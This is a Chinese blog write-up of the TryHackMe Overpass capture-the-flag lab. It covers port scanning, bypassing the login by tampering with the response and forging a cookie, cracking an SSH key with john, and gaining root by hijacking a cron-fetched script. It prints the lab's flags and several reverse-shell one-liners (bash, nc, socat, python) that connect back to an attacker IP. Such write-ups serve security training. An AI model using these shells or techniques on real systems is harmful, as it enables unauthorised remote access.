【全网最细】TryHackMe Overpass 题解

最新推荐文章于 2024-07-14 20:31:35 发布
最新推荐文章于 2024-07-14 20:31:35 发布
阅读量719 收藏 12
点赞数 20
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57363026/article/details/138959832
版权

TryHackMe Overpass 题解

在这里插入图片描述

菜菜的复现记录

web渗透阶段

扫描端口

nmap -v -A “服务器地址”

在这里插入图片描述

扫描目录(目录fuzz)

这里我直接使用的是dirsearch使用的是内置的字典

python dirsearch.py -u “服务器的地址”

在这里插入图片描述

这里我们扫描到有用的就是
/admin.html
/admin
/login.js

查看目录的内容

我们发现/admin.html和/admin页面一样
看到登录框扫描了一下弱口令和post请求的sql注入
在这里插入图片描述

在这里插入图片描述

都是失败告终

现在我们看一下login.js这个应该是和登录相关的
在这里插入图片描述

标注的这部分是我们利用的部分,我们要绕过login.js来进行登录,因为他这个地方我如果没有让服务器响应"不正确的凭证"那不就可以登录了

/**
 * 登录函数
 */
async function login() {
    // 获取用户名输入框元素
    const usernameBox = document.querySelector("#username");
    // 获取密码输入框元素
    const passwordBox = document.querySelector("#password");
    // 获取登录状态元素
    const loginStatus = document.querySelector("#loginStatus");
    // 清空登录状态文本内容
    loginStatus.textContent = "";

    // 创建包含用户名和密码的对象
    const creds = { username: usernameBox.value, password: passwordBox.value };

    // 发送数据到指定路径进行登录请求并等待响应
    const response = await postData("/api/login", creds);

    // 获取响应的文本内容
    const statusOrCookie = await response.text();

    // 如果响应文本是"不正确的凭证"
    if (statusOrCookie === "Incorrect credentials") {
        // 设置登录状态文本为"不正确的凭证"
        loginStatus.textContent = "Incorrect Credentials";
        // 清空密码输入框的值
        passwordBox.value = "";
    } else {
        // 设置名为"SessionToken"的 Cookie 值为响应内容
        Cookies.set("SessionToken",statusOrCookie);
        // 将页面重定向到"/admin"
        window.location = "/admin";
    }
}
YAKit抓包

在这里插入图片描述

我们这里就是要修改返回包(响应包)所以一定要把Yakit的劫持响应打开
打开劫持响应!!!
打开劫持响应!!!
打开劫持响应!!!

一定要打开不然没法改

在这里插入图片描述

这个包返回了Incorrect credentials有这个就说明没过所以我们要改成302并把Incorrect credentials删掉

HTTP/1.1 302 FOUND
Date: Tue, 14 May 2024 10:23:08 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 21

传完点一下刷新就可未授权登录了

在这里插入图片描述

我看网上还有可以利用cookie来登录的就是创建一个cookie来登录

创建一个cookie

document.cookie="SessionToken=pleaselogmein"

在这里插入图片描述

再刷新界面就可以登录james13

在这里插入图片描述

SSH登录

这里他告诉我们这是一个ssh密钥那我们就开冲

在这里插入图片描述

冲了但是没冲进去好
那我们就用私钥来解一下私钥密码

我们先将这个ssh的hash提取出来

ssh2john Overpass_key > Overpass_key.txt

在这里插入图片描述

提取出来我们开始使用john工具撞hash
john --wordlist=/usr/share/wordlists/rockyou.txt Overpass_key.txt
使用了rockyou.txt这个字典来破解hash如果你们的rockyou.txt是rockyou.txt.gz就使用gzip解压一下

gzip -d /usr/share/wordlists/rockyou.txt.gz

在这里插入图片描述

这样我们得到了james13的密码
登陆一下linux服务器

ssh -i Overpass_key james@10.10.144.230

在这里插入图片描述

查看目录找user.txt拿到第一个flag
在这里插入图片描述

thm{65c1aaf000506e56996822c6281e6bf7}

Cron提权

注意如果是虚拟机请映射端口我是再本机上弄得
注意如果是虚拟机请映射端口!!!
注意如果是虚拟机请映射端口!!!

查看todo.txt

todo.txt我英语不好todo.txt看看翻译吧

在这里插入图片描述

在这里插入图片描述

他上面提到了自动构建脚本,我们看一下定时任务有啥,

cat /etc/crontab

我看别人都是使用linpeass来寻找提权但是我没下下来

在这里插入图片描述

我们发现他使用的root执行了连接overpass.thm/downloads/src/buidscript.sh,很明显他想下载某个脚本

这个 /erc/crontab我们没有更改权限,所以只能从连接入手

我们去他hosts文件看一看overpass.thm是什么

在这里插入图片描述

他是本地的命令,那我们改成自己的IP不就连接自己然后在脚本里面写反向连接的shell不就可以拿到权限了吗

将overpass.thm改成自己的IP

在这里插入图片描述

切换到本机找一个目录

mkdir -p downloads/src
#创建了downloads/src目录

创建一个buildscript.sh的文件,并在里面写入我们的paylode

#做个事例把可以用不可以用的都列这里了,这里我用的是第一条
#使用bash
bash -c 'exec bash -i &>/dev/tcp/10.14.81.28/8888 <&1'
#使用sh
bash -c 'exec sh -i &>/dev/tcp/10.14.81.28/8888 <&1'
#使用NC
bash -c 'nc -e /bin/bash 10.14.81.28 8888'
#使用socat---靶机上没有socat
bash -c 'socat exec:"bash -li",pty,stderr,setsid,sigint,sane tcp:10.14.81.28:8888'
#使用python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.81.28",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在这里插入图片描述

然后我们要在刚开始创建downlodes的目录开启http服务,因为我是OpenVPN连接的所以要加–bind 0.0.0.0

python -m http.server 80 --bind 0.0.0.0

在这里插入图片描述

脚本里创建了反向连接的shell我们直接就是监听端口等待连接坐等连接就OK了

在这里插入图片描述

脚本里创建了反向连接的shell我们直接就是监听端口等待连接坐等连接就OK了
他会在一段时间内下载并启动脚本进行反向连接

flag:thm{7f336f8c359dbac18d54fdd64ea753bb}

TiAmo_睡不醒
关注
  • 20
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
tryhackme
03-08
tryhackme
overpass-api-python-wrapper:OpenStreetMap Overpass API的Python绑定
05-05
import overpassapi = overpass . API () API构造函数采用几个参数,所有参数都是可选的:endpoint 默认端点是https://overpass-api.de/api/interpreter但是您可以传入另一个实例: api = overpass . API ( ...
TryHackMe OverPass 3 - 全网最细
m0_57363026的博客
05-21 1229
这个是菜菜TiAmo的复现和学习日记,如果感觉不错点点关注和喜欢吧。
TryHackMe Overpass2 题解
m0_57363026的博客
05-19 926
这里我们看到http协议的包还有/development/upload.php,也就是说攻击者是靠文件上传来获得权限的那么我们就看看包里面都有什么。他这个地方和最后面的一串看起来像加密的东西有点关联的样子,go语言菜菜是不会的,AI生成的注释大家自行看一下,不过像编码的只有这两个地方像。我里个豆,ssh后门,我们再继续往下看,下载完了以后他还打开了弄了一个私钥,连接的端口是2222。
Tryhackme-Overpass
个人博客
09-06 1021
Overpass 文章目录OverpassOverpassTask1 OverpassOverpass 2 - Hackedtask1 Forensics - Analyse the PCAPtask2 Research - Analyse the codetask3 Attack - Get back in!Overpass 3-HostingTask1 Overpass3 - Adventures in Hosting Overpass Task1 Overpass nmap扫描,靶机开启22-ssh
tryhackme--Overpass
qq_45414878的博客
11-16 425
tryhackmeOverpass 用nmap扫描主机,因为前面我已经简单扫过开放的端口了,所以我现在直接放上详细扫描的贴图和命令 nmap -T4 -sS -sV 10.10.220.203 -sC -p 22,80 扫描得到的目录 各种扫描,注入,爆破都试过了,也没有历史漏洞,看了wp才知道是js代码逻辑漏洞,这方面练的太少了,以至于没有找到切入点 async function login() { const usernameBox = document.querySelector("
tryhackme--Overpass 2 - Hacked
qq_45414878的博客
11-05 471
tryhackme--Overpass 2 - HackedTask 1 -Forensics - Analyse the PCAP#1 What was the URL of the page they used to upload a reverse shell?#2 What payload did the attacker use to gain access?#3 What password did the attacker use to privesc?#4 How did the attack
overpass-api 部署(docker)
CodeStar`
06-03 390
Overpass是一个用于访问和查询OpenStreetMap(OSM)数据的开放式数据API和查询语言。OpenStreetMap是一个由社区驱动的免费开放地图项目,用户可以贡献地理数据并使用它来创建自由和开放的地图。Overpass API提供了一种强大的方式来获取和筛选OpenStreetMap数据。它允许用户根据各种条件和过滤器来执行高级查询,并返回符合查询条件的地理数据。通过Overpass API,用户可以按照地理位置、特定标签、区域范围等多种方式来查询OpenStreetMap数据。
overpass-turbo下载铁路线
qq_40098572的博客
08-02 379
我也没啥好的批量方法, 大规模的数据都是从osm星球下载的,有部分不存在的数据就通过上述方法一条一条处理。上面的198498代表在osm中铁路线的id,这个id获取流程是从osm网站查询出来的。
Overpass Turbo下载OSM数据
Puzzle的博客
06-15 4602
前言 网址:http://overpass-turbo.eu/ 注:需要翻墙才能成功加载页面 注:页面出现missing translation问题 实验 1.打开网页 2.点击【Wizard】,填写所需下载类型 3.框选所需地点 4.点击【Run】,查看结果 5.导出数据 ...
overpass接口
蓝蓝的天
11-22 1789
1)获取node节点 2)获取way节点
query_overpass-turbo
04-07
使用比利时的overpass-turbo查询OSM 立交涡轮增压(overpass-turbo.eu)是OpenStreetMap的基于Web的数据挖掘工具。 将您的Overpass API查询放入编辑器中,单击“运行”按钮,并对显示的OSM数据的优势感到惊讶导出...
nim-overpass:Nim的OpenStreetMap Overpass API库
02-02
**nim-overpass:Nim的OpenStreetMap Overpass API库** `nim-overpass` 是一个用Nim编程语言编写的库,它为开发者提供了一个方便的接口,用于与OpenStreetMap(OSM)的Overpass API进行交互。Nim是一种高效、简洁且...
overpass-doc
05-07
overpass-doc支持用于记录Overpass QL查询的标记,以及用于查询集合的程序包元数据。 这些功能将在下一节中介绍。 立交QL文档扩展 .osm overpass-doc处理您的Overpass查询,这些查询另存为带有.osm扩展名的文本文件...
云WAF | 云waf保护你的网络安全
weixin_62641226的博客
07-11 403
云waf是一种灵活而有效的网络安全手段,可以有效地提高网络的安全性能。灵活、可扩展:云计算中的 WAF是以云计算的方式提供的,具有灵活、可伸缩的特点,可以根据实际需要对防护性能进行动态调整。易于部署:云 WAF相对于传统的硬件防火墙,在不增加硬件配置及网络配置的情况下,部署起来更方便、更灵活。实时的威胁信息:云端 WAF能够及时地对各种新型的网络攻击手段做出反应,并能及时地响应当前的威胁信息。自动化程度高:云计算 WAF具有自动分析海量资料的能力,并且能够为您的应用提供最好的防护措施。
医疗器械网络安全 | 漏洞扫描、渗透测试没有发现问题,是否说明我的设备是安全的?
网 安 云
07-10 670
尽管漏洞扫描、模糊测试和渗透测试在评估系统安全性方面是非常重要和有效的工具,但即使这些测试没有发现任何问题,也不能完全保证您的医疗器械是绝对安全的。网安云,目针对医疗器械海外国内注册、变更推出网络安全解决方案,专业安全专家与法规研究团队对国内、美国、欧盟等国家医疗器械注册网络安全要求进行深入钻研,为客户定制化网络安全方案,帮助客户为设备注册、上市出具符合法规要求的网络安全文件。综上所述,虽然漏洞扫描、模糊测试和渗透测试是评估医疗器械安全性的重要手段,但它们并不能完全保证系统的安全。医疗器械网络安全顾问。
等保测评助力网络安全治理现代化
最新发布
waitaikong_的博客
07-14 218
等保测评,即信息安全等级保护测评,是依据国家相关法律法规和标准,对信息系统进行安全等级划分和安全性能评估的过程。它涵盖了从技术到管理、从人员到流程的多维度评估,旨在确保信息系统在面对各种威胁时的安全性和可靠性。随着网络技术的发展和网络安全形势的变化,等保测评在网络安全治理现代化中扮演着越来越重要的角色。
如何做好漏洞扫描工作提高网络安全
dexunyun的博客
07-11 876
漏洞扫描工具,作为网络安全领域的重要工具之一,其工作原理主要通过自动化技术对目标系统(包括网络设备、应用程序、数据库等)进行全面扫描,识别并报告可能存在的安全漏洞和弱点。通过采取预防和防范措施,降低安全风险,优化安全管理,提升自身的网络安全防护能力,从而可以更好地实现数字化转型的目标。选择合适的工具:根据企业的实际需求(如扫描范围、扫描深度、报告质量等)选择合适的漏洞扫描工具。涵盖多种类型资产扫描,支持云内外网站和主机扫描,支持内网扫描、智能关联各资产之间的联系,自动发现资产指纹信息,避免扫描盲区。
overpass turbo使用
10-17
Overpass Turbo是一个在线的地理信息系统工具,用于查询和可视化OpenStreetMap(开放街图)的数据。它通过使用Overpass API(一种基于HTTP的接口)来获取OpenStreetMap的数据,并以交互式和可视化的方式呈现查询结果。 使用Overpass Turbo,我们可以执行各种查询操作,以获取我们需要的地理数据。比如,我们可以根据地理位置、标签、关键词等条件来查询OpenStreetMap中的点、线、面等地理要素。这些查询可以是简单的,比如查找某个特定地点的信息,也可以是复杂的,比如查找某个区域内特定类型的设施。 Overpass Turbo提供了一个直观友好的用户界面,让我们可以轻松地构建查询并实时预览查询结果。我们可以使用简单的操作来缩放、平移地图,以便更好地查看查询结果。此外,Overpass Turbo还提供了一些功能强大的过滤器,可以帮助我们根据特定的标签和属性来筛选查询结果,从而更好地满足我们的需求。 除了查询和可视化功能,Overpass Turbo还提供了一些其他实用的功能。例如,我们可以将查询结果导出为GeoJSON、KML等格式,方便我们在其他地理信息系统中使用。我们还可以保存和分享我们的查询和可视化结果,以便与他人合作或记录我们的工作。 总的来说,Overpass Turbo是一个功能强大且易于使用的工具,可以帮助我们查询和可视化OpenStreetMap的数据。无论是专业的地理信息系统专家还是普通用户,都可以通过使用Overpass Turbo来满足他们的地理信息需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TiAmo_睡不醒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值